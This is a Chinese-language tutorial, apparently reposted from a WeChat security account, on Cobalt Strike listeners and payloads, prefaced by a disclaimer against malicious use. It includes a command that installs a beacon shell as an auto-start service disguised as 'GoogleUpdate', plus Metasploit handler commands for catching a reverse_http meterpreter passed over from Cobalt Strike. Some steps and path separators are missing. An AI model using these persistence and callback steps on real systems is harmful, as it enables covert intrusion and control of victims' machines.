声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
CobaltStrike是一款模仿高级威胁者攻击行为的后渗透攻击框架。覆盖了APT攻击链中所需要的多个技术环节,是一款小巧、灵活而又功能强大的后渗透攻击工具。
01
CobaltStrike监听介绍
-
点击菜单中的"Listeners"->"payload"下拉就能看到CobaltStrike所支持的所有payload了。
02
基于http协议的反向连接
所谓基于http协议的反向连接,就是把木马回连的流量,按照http协议的数据格式进行封装,该方式又叫模拟http协议进行传输,因为http协议对防火墙的穿透效果较好,所以大多数人喜欢使用基于http协议Payload。
03
基于https协议的反向连接
(2)生成 https 协议的 beacon shell:
(3)将生成的 beacon shell 放在目标主机的 C:WindowsHelpHelp 目录,执行指令:
sc create GoogleUpdate binpath= "C:WindowsHelpHelpservrcs.exe" start= auto displayname= "Plugins Transfer Service"创建系统服务sc start GoogleUpdate启动该服务sc stop GoogleUpdate停止该服务sc delete GoogleUpdate删除指定服务,一定要先停止再删除
04
SMB 监听器
05
反向http协议外部监听器
外部监听器就是为了更方便的去配合其它的一些渗透工具如:Metasploit/empire 等,进行协同渗透而设计的。比如,现在通过其它方式已经拿到了目标内网一台机器的 beaconshell,但由于 CobaltStrike 自身内置的相关内网渗透功能太少, 想用 msf 或者 empire 继续去渗透目标内网,这时候我们就可以使用 CobaltStrike 的外部监听器了。
> use exploit/multi/handler> set payload windows/meterpreter/reverse_http> set lhost 192.168.80.129> set lport 1111> exploit -j
(3)右键点击已有的beacon shell,选择Spawn
(4)选择foreign_http 外部监听
(5)然后就可以在msf上成功看到反弹到的meterpreter了
推 荐 阅 读
本文始发于微信公众号(潇湘信安):CobaltStrike专题 | CobaltStrike监听及Payload使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论